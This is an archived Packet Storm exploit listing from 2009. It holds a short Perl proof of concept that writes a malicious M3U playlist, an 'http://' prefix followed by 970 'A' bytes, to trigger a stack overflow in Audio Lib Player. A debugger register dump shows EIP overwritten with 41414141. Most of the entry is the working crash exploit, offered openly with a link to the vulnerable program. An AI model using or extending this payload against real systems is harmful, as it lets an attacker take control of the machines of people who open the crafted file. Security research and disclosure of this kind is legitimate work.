Lucene search

K
packetstormCyber-ZonePACKETSTORM:79401
HistoryJul 20, 2009 - 12:00 a.m.

Audio Lib Player Stack Overflow

2009-07-2000:00:00
Cyber-Zone
packetstormsecurity.com
24
`  
#!/usr/bin/perl  
#  
#  
#  
# Audio Lib Player (M3U File) Local Stack Overflow PoC  
#  
# download : http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm  
# Found By : Cyber-Zone (ABDELKHALEK)  
#  
#  
# Greatz : All friends (Jiko :)) Sec-r1z.CoM r1z ... Todd and Packet Storm ;)  
#  
#olly  
#EAX FFFFFFFF  
#ECX 000038D9  
#EDX 0012F70C  
#EBX 00000068  
#ESP 0012FF00   
#EBP 41414141  
#ESI 0012FF10   
#EDI 00000008  
#EIP 41414141  
#  
my $Header = "#EXTM3U\n";  
  
my $ex="http://"."A" x 970; # Random  
  
open(MYFILE,'>>cyber.m3u');  
  
print MYFILE $Header.$ex;  
  
close(MYFILE);  
  
  
_________________________________________________________________  
Avec Windows Live, vous organisez, retouchez et partagez vos photos.  
http://www.microsoft.com/northafrica/windows/windowslive/products/photo-gallery-edit.aspx`